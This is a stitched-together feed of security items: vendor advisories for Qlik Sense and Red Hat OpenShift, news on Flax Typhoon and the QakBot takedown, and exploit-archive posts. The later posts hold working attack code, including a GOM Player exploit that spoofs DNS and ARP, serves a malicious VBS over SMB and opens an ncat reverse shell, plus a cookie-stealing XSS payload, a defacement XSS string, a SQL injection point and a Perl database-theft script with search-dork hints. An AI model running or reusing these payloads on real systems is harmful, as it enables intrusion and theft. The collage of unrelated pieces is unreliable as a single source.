A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.

****Executive Summary** **

Two security issues in Qlik Sense Enterprise for Windows have been identified and patches made available. If the two vulnerabilities are combined and successfully exploited, these issues could lead to a compromise of the server running the Qlik Sense software, including unauthenticated remote code execution (RCE). 

These issues were identified and responsibly reported to Qlik by Adam Crosser and Thomas Hendrickson of Praetorian. No reports of them being exploited have been received. 

****Affected Software** **

All versions of Qlik Sense Enterprise for Windows **prior** to and including these releases are impacted: 

*   May 2023 Patch 3
*   February 2023 Patch 7
*   November 2022 Patch 10
*   August 2022 Patch 12

****Severity Rating** **

Using the CVSS V3.1 scoring system (https://nvd.nist.gov/vuln-metrics/cvss), Qlik rates one as high severity and one as critical. 

****Vulnerability Details**  
**

**CVE-2023-41266** (QB-21220) Path traversal in Qlik Sense Enterprise for Windows 

**Severity:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N **(8.2 High)** 

Due to improper validation of user supplied input, it is possible for an unauthenticated remote attacker to generate an anonymous session which allows them to perform HTTP requests to unauthorized endpoints. 

**CVE-2023-41265** (QB-21222) HTTP Tunneling vulnerability in Qlik Sense Enterprise for Windows 

**Severity:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N **(9.6 Critical)** 

Due to improper validation of HTTP Headers a remote attacker is able to elevate their privilege by tunnelling HTTP requests, allowing them to execute HTTP requests on the backend server hosting the repository application. 

****Resolution** ******Recommendation** **

Customers should upgrade Qlik Sense Enterprise for Windows to a version containing fixes for these issues. Fixes are available for the following versions: 

*   August 2023 Initial Release 
*   May 2023 Patch 4 
*   February 2023 Patch 8 
*   November 2022 Patch 11 
*   August 2022 Patch 13 

All Qlik software can be downloaded from our official Qlik Download page (customer login required).

CVE-2023-41266: Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265)

By Deeba Ahmed
Researchers believe that this time instead of cyber espionage, Chinese threat actors may have opted for more complex information ops.
This is a post from HackRead.com Read the original post: Microsoft: Chinese APT Flax Typhoon uses legit tools for cyber espionage

**KEY FINDINGS**

*   **Microsoft has identified a Chinese government-backed APT group called Flax Typhoon.**

*   **The group has been targeting Taiwanese organizations since mid-2021.**

*   **Flax Typhoon does not rely heavily on malware to maintain persistence on the targeted networks.**

*   **Instead, the group uses tools built into the operating system and some benign software.**

*   **The group’s goal is to conduct cyber espionage and maintain access to organizations across a broad range of industries.**

Microsoft has not observed Flax Typhoon act on final objectives in this campaign, but the group’s activities could pose a threat to businesses outside Taiwan.

Microsoft Threat Intelligence Team has shared exclusive details of a newly detected Chinese government-backed Advanced Persistent Threat (APT) group Flax Typhoon’s activities. The group (aka Ethereal Panda) has been installing a network of long-term, persistent infections across Taiwanese organizations. 

It is worth noting that the group doesn’t rely too much on malware to retain persistence on the targeted networks but uses tools built into the operating system with some benign software for this purpose.

Moreover, researchers observed that the group uses the access to carry out many different activities apart from espionage, which means it is an information-gathering campaign active since mid-2021.

> “Flax Typhoon’s discovery and credential access activities do not appear to enable further data-collection and exfiltration objectives. While the actor’s observed behavior suggests Flax Typhoon intents to perform espionage and maintain their network footholds, Microsoft has not observed Flax Typhoon act on final objectives in this campaign.”
> 
> Microsoft

So far, dozens of organizations across a wide range of sectors/industries have been targeted in this campaign, indicating that this could be an extensive cyber espionage activity.

However, Microsoft believes its scope may not be limited to Taiwanese businesses in the near future. The group uses legit tools and utilities built into the Windows OS (e.g. LOLbins) for its stealthy operations, which it can reuse to target organizations outside Taiwan.  

Researchers revealed that companies may easily fall into the trap of Flax Typhoon because it uses commonplace techniques that may be overlooked by organizations. 

In its report, the tech giant noted that This APT group focuses on persistence, credential access, and lateral movement. Detecting and mitigating this threat is challenging because compromised accounts might be modified or closed, and infected systems will be isolated.

Companies/entities in the government, education, IT, and manufacturing sectors across Southeast Asia, Africa, and North America have been the targets of Flax Typhoon’s previous campaigns. 

The group prefers using the China Chopper web shell, Bad Potato and Juicy Potato privilege escalation tools, Metasploit, Mimikatz, SoftEther virtual private network (VPN) client and specializes in exploiting known vulnerabilities in publicly accessible servers and targets a range of services, including VPN, web, Java, and SQL applications.

After gaining initial access, the group uses command-line tools for establishing persistence and then deploys a VPN connection to the attacker’s C2 infrastructure. Lastly, it steals credentials and scans for further vulnerabilities using VPN access.

Flax Typhoon attack chain (Microsoft)

This isn’t the first time China has targeted Taiwan, which it considers a renegade province. The country has launched espionage and DDoS attacks against the country in the past. This time, China might want access to sensitive data as well as maintain access to organizations across the broadest range of industries.

Microsoft has notified targeted/impacted customers and is helping them secure their systems.

**RELATED ARTICLES**

1.  Microsoft warns of Nobelium hackers using FoggyWeb backdoor
2.  New Phishing Attack Spoofs Microsoft 365 Authentication System
3.  Reply URL Flaw Allowed Unauthorized MS Power Platform API Access

Microsoft: Chinese APT Flax Typhoon uses legit tools for cyber espionage

The U.S. government today announced a coordinated crackdown against QakBot, a complex malware family used by multiple cybercrime groups to lay the groundwork for ransomware infections. The international law enforcement operation involved seizing control over the botnet's online infrastructure, and quietly removing the Qakbot malware from tens of thousands of infected Microsoft Windows computer systems.

The U.S. government today announced a coordinated crackdown against **QakBot**, a complex malware family used by multiple cybercrime groups to lay the groundwork for ransomware infections. The international law enforcement operation involved seizing control over the botnet’s online infrastructure, and quietly removing the Qakbot malware from tens of thousands of infected Microsoft Windows computers.

Dutch authorities inside a data center with servers tied to the botnet. Image: Dutch National Police.

In an international operation announced today dubbed “**Duck Hunt**,” the **U.S. Department of Justice** (DOJ) and **Federal Bureau of Investigation** (FBI) said they obtained court orders to remove Qakbot from infected devices, and to seize servers used to control the botnet.

“This is the most significant technological and financial operation ever led by the Department of Justice against a botnet,” said **Martin Estrada**, the U.S. attorney for the Southern District of California, at a press conference this morning in Los Angeles.

Estrada said Qakbot has been implicated in 40 different ransomware attacks over the past 18 months, intrusions that collectively cost victims more than $58 million in losses.

Emerging in 2007 as a banking trojan, QakBot (a.k.a. **Qbot** and **Pinkslipbot**) has morphed into an advanced malware strain now used by multiple cybercriminal groups to prepare newly compromised networks for ransomware infestations. QakBot is most commonly delivered via email phishing lures disguised as something legitimate and time-sensitive, such as invoices or work orders.

**Don Alway**, assistant director in charge of the FBI’s Los Angeles field office, said federal investigators gained access to an online panel that allowed cybercrooks to monitor and control the actions of the botnet. From there, investigators obtained court-ordered approval to instruct all infected systems to uninstall Qakbot and to disconnect themselves from the botnet, Alway said.

The DOJ says their access to the botnet’s control panel revealed that Qakbot had been used to infect more than 700,000 machines in the past year alone, including 200,000 systems in the United States.

Working with law enforcement partners in France, Germany, Latvia, the Netherlands, Romania and the United Kingdom, the DOJ said it was able to seize more than 50 Internet servers tied to the malware network, and nearly $9 million in ill-gotten cryptocurrency from QakBot’s cybercriminal overlords. The DOJ declined to say whether any suspects were questioned or arrested in connection with Qakbot, citing an ongoing investigation.

According to recent figures from the managed security firm **Reliaquest**, QakBot is by far the most prevalent malware “loader” — malicious software used to secure access to a hacked network and help drop additional malware payloads. Reliaquest says QakBot infections accounted for nearly one-third of all loaders observed in the wild during the first six months of this year.

Qakbot/Qbot was once again the top malware loader observed in the wild in the first six months of 2023. Source: Reliaquest.com.

Researchers at **AT&T Alien Labs** say the crooks responsible for maintaining the QakBot botnet have rented their creation to various cybercrime groups over the years. More recently, however, QakBot has been closely associated with ransomware attacks from **Black Basta**, a prolific Russian-language criminal group that was thought to have spun off from the Conti ransomware gang in early 2022.

Today’s operation is not the first time the U.S. government has used court orders to remotely disinfect systems compromised with malware. In April 2022, the DOJ quietly removed malware from computers around the world infected by the “Snake” malware, an even older malware family that has been tied to the GRU, an intelligence arm of the Russian military.

Documents published by the DOJ in support of today’s takedown state that beginning on Aug. 25, 2023, law enforcement gained access to the Qakbot botnet, redirected botnet traffic to and through servers controlled by law enforcement, and instructed Qakbot-infected computers to download a Qakbot Uninstall file that uninstalled Qakbot malware from the infected computer.

“The Qakbot Uninstall file did not remediate other malware that was already installed on infected computers,” the government explained. “Instead, it was designed to prevent additional Qakbot malware from being installed on the infected computer by untethering the victim computer from the Qakbot botnet.”

The DOJ said it also recovered more than 6.5 million stolen passwords and other credentials, and that it has shared this information with two websites that let users check to see if their credentials were exposed: Have I Been Pwned, and a “Check Your Hack” website erected by the **Dutch National Police**.

Further reading:

–The DOJ’s application for a search warrant application tied to Qakbot uninstall file (PDF)  
–The search warrant application connected to QakBot server infrastructure in the United States (PDF)  
–The government’s application for a warrant to seize virtual currency from the QakBot operators (PDF)

U.S. Hacks QakBot, Quietly Removes Botnet Infections

Red Hat Security Advisory 2023-4835-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift support for Windows Containers 5.1.2 security update  
Advisory ID:       RHSA-2023:4835-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4835  
Issue date:        2023-08-29  
CVE Names:         CVE-2023-3676 CVE-2023-3955   
=====================================================================

1. Summary:

The components for Red Hat OpenShift support for Windows Containers 5.1.2  
are now available. This product release includes bug fixes and security  
updates for the following packages: windows-machine-config-operator and  
windows-machine-config-operator-bundle.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift support for Windows Containers allows you to deploy  
Windows container workloads running on Windows Server containers.

Security Fix(es):

* kubernetes: Insufficient input sanitization on Windows nodes leads to  
privilege escalation (CVE-2023-3676)

* kubernetes: Insufficient input sanitization on Windows nodes leads to  
privilege escalation (CVE-2023-3955)

For more details about the security issue(s), including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For Windows Machine Config Operator upgrades, see the following  
documentation:  
https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2227126 - CVE-2023-3676 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation  
2227128 - CVE-2023-3955 kubernetes: Insufficient input sanitization on Windows nodes leads to privilege escalation

5. References:

https://access.redhat.com/security/cve/CVE-2023-3676  
https://access.redhat.com/security/cve/CVE-2023-3955  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7gY6AAoJENzjgjWX9erEUaQP+wU4my4rzFBFp7Z5C2ofs3nn  
7TvEeLB3KI9qPqM4RgLVzybQBZPAlBVWiLtRJeqgwiRX1odZLbAtN1Gr42oL8eGw  
vqmCo1KKaO/oVFFZsZv7YuyThiWEZ0a1Rswg9Cai5bEeFOI7+8HlylEtwTiSUmWx  
22ysenpUOeQPMgOTaVE0XNDwuSEukrmNo391stLAfSyAx3p9wiX3tNO25y+VvNLj  
3CD0yHyWqC0lkyK2gXzsv4lt2BFoZNpXPvGji+NeO1HLs3Ni81B4CmRbxREPep3h  
/mfqSaTCnPOGz5DRb8a4f8SRvGlck7on1I7Strlf1infSZuDtnv4Bt9MzV1CfbMi  
T89euKSKr/vCqelRXBuSyRgjsgTlqvP5aFFVF4o/ngDOC5y5/rLjg6enUrQdD6BB  
u+T5/nBU4yzb84SD5RE9KCPWUbXmb5F7ksCXDyciwanN+G4GBKFiCrsE28kK9C78  
ZcP4z9ypfRFjBtVgHrMhnWhvXRu0S5bIs+1zXw027cmsN5X9dA2NV+ROMICPqJZm  
aQHJAWLoTd5Gxdqj0itUN7W/TfIO7kf4kvJezgkC8YRdaQWpmLNQ9xbEV6rTm72a  
LBoENzd38TIK8BKj+I1oTVmPpQk0y6yXjxDLTUSDGvp+z3ibhkBO9oFaLJDxG24y  
4SLyqK+bCiTx33pq0ayS  
=r8uD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4835-01

Grawlix version 1.5.1 suffers from a cross site scripting vulnerability.

    ## Title: grawlix-1.5.1 XSS-Reflected## Author: nu11secur1ty## Date: 08/29/2023## Vendor: https://getgrawlix.com/## Software:## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the ref request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload vy7tu"><script>alert(1)</script>e284ovbptuv was submittedin the ref parameter. This input was echoed unmodified in theapplication's response. The attacker can steal PHPSESSID cookie andcan trick the victim into visiting his or some other dangerous URLaddress.STATUS: HIGH-Vulnerability[+]Exploit:```POSTGET /grawlix-1.5.1/grawlix-cms-1.5.1/_admin/panl.login.php?grlx_xss_token=&ref=book.view.phpvy7tu%22%3E%3Cscript%3Ealert(%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65)%3C%2fscript%3Ehttp://pornhub.com&username=UXBhcRhk&extra=y9R%21m8c%21W6&submit=LoginHTTP/1.1Host: localhostsec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=oq08tie8elf34amgmti9e8bel2Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/getgrawlix/getgrawlix-1.5.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/grawlix-cms-151-xss-reflected.html)## Time spend:00:27:00

Grawlix 1.5.1 Cross Site Scripting

Mozilla Firefox only stores up to 1024 HSTS entries. When the limit is reached, Firefox discards entries based on their age and recent visits to the domain in question.

    # VULNERABILITYMozilla Firefox only stores up to 1024 HSTS entries.When the limit is reached, Firefox discards entries based on their age and recent visits to the domain in question.# IMPACTThe HSTS header ensures that once a page has been visited, the browser will attempt to connect to it using HTTPS.The limit means that Firefox effectively does not store any further HSTS headers, as new ones permanently override each other.Sites without HSTS protection are vulnerable to machine-in-the-middle attacks, especially downgrade attacks such as SSL Stripping.# MORETo find out if you are affected, check the number of HSTS entries:* Linux: `wc -l ~/.mozilla/firefox/{profile}/SiteSecurityServiceState.txt`* Windows: `find /c /v " " ".\AppData\Roaming\Mozilla\Firefox\Profiles\{profile}\SiteSecurityServiceState.txt"`This behavior was first reported by Sheila Ayelen Berta and Sergio De Los Santos at Black Hat Europe 2017.I filed a bug report in February 2023 that is currently being worked on.# REFERENCES* Bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1818984* Mastodon thread: https://infosec.exchange/@kpwn/110010433703922665* Blog post: https://kpwn.de/2023/03/http-strict-transport-security/#1-the-limited-number-of-hsts-entries* Black Hat Europe 2017: Breaking Out HSTS (and HPKP) On Firefox, IE/Edge and (Possibly) Chrome   * Slides: https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf   * Talk: https://www.youtube.com/watch?v=dPnU9_pXJ5k

Mozilla Firefox HSTS Enty Limit

GOM Player version 2.3.90.5360 man-in-the-middle proof of concept remote code execution exploit.

    # Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)# Date: 26.08.2023# Author: M. Akil Gündoğan# Contact: https://twitter.com/akilgundogan# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Version: 2.3.90.5360 # Tested on: Windows 10 Pro x64 22H2 19045.3324# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.# Vulnerability Description: # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. # Full disclosure, developers should be more careful about software security.# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.# Some spaghetti and a bad code but it works :)banner = """\033[38;5;196m+-----------------------------------------------------------+|     GOM Player 2.3.90.5360 - Remote Code Execution        ||   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |+-----------------------------------------------------------+\033[0m""" +""" \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""import time,os,zipfile,subprocess,socket,sysprint(banner)if os.geteuid() != 0:    print("You need root privileges to run the exploit, please use sudo...")    sys.exit(1)targetIP = input("- Target IP address: ")listenPort = input("- Listening port for Reverse Shell: ")def fCreate(fileName,fileContent): # File create func.     f = open(fileName,"w")    f.write(fileContent)    f.close()    gw = os.popen("ip -4 route show default").read().split()s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)s.connect((gw[2], 0))ipaddr = s.getsockname()[0]gateway = gw[2]host = socket.gethostname()print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) print("\n[*]- Stage 1: Downloading neccesary tools...")smbFolderName = "GomUpdater" # change this (optional)expWorkDir = "gomExploitDir" # change this (optional)os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncatprint("    [*] - Ncat has been downloaded.")subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacketprint("    [*] - Impacket has been downloaded.")subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.pyprint("    [*] - DNSSpoof.py has been downloaded.")print("[*]- Stage 2: Creating Attacker SMB Server...")subprocess.Popen("cd " + expWorkDir + /impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.time.sleep(5) # It's necessary for exploit stability. smbIP = ipaddrspoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTPprint("[*]- Stage 3: Creating Attacker Web Page...")# change this (optional) screenExpPage = """<meta charset="utf-8"><script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';</script>"""fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)time.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")vbsCommand = '''Set shell=CreateObject("wscript.shell") Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")WScript.Sleep 5000Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)fCreate(expWorkDir + "/payload.vbs",vbsCommand)urlShortcut = '''[InternetShortcut]URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbsIDlist='''fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)time.sleep(3) # It's necessary for exploit stability. zipName = expWorkDir + "/smb-shared/archive.zip"payload_filename = os.path.join(expWorkDir, "payload.vbs")  with zipfile.ZipFile(zipName, "w") as malzip:    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))print("[*]- Stage 5: Running the attacker's web server...")subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.servertime.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...time.sleep(10) # It's neccesary for exploit stability.os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")subprocess.run("nc -lvnp " + listenPort,shell=True)subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...

GOM Player 2.3.90.5360 MITM / Remote Code Execution

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

i-Gallery version 3.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : i-Gallery v3.4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://wmscripti.com/asp-scriptler/igallery-image-resim-galerisi-scripti.html                                      |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (igallery.mdb ) file  
    The (igallery.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# i-Gallery v3.4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('i-Gallery v3.4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/igallery.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/igallery.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/igallery.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Tag

#windows